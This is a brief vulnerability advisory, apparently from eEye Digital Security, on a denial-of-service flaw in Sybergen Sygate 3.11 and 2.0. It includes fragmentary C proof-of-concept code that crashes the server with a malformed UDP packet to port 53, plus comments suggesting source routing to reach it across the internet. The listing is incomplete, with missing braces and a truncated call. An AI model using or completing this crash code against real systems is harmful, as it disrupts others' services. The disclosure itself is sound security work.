Sybergen Sygate Subject to DoS
Reported June 30 by eEye Digital Security
VERSIONS EFFECTED Sybergen Sygate 3.11 and 2.0 DESCRIPTION
Sybergen"s Sygate is subject to a possible denial of service attack from users inside the protected network. The denial of service begins when a user sends a UDP datagram which contains invalid data to port 53 on the Sygate server, as seen in the demonstration code below.
//Sygate Crash by: email@example.com (April-00)
//Will crash Sygate (http://www.sygate.com/) when ran from the internal LAN.
//Play with source routing to get it to work across the internet.
//Just hit the Internal IP of the Sygate machine.
int main (int argc, char **argv)
int SockFD, addrlen, bsent;
struct sockaddr_in UDPSock;
char bomb\[\]= "changeiscoming";
printf("Sygate Crash by: firstname.lastname@example.org\n");
printf("Usage: %s \[server\]\n",argv\[0\]);
SockFD=socket(AF_INET, SOCK_DGRAM, 0);
bsent=sendto(SockFD,&bomb,13,0,(struct sockaddr *) &UDPSock,
printf("Sent Crash.\nBytes Sent: %i\n",bsent);
Sybergen is aware of the issue however no response was known at the time of this writing.
Discovered and reported by eEye Digital Security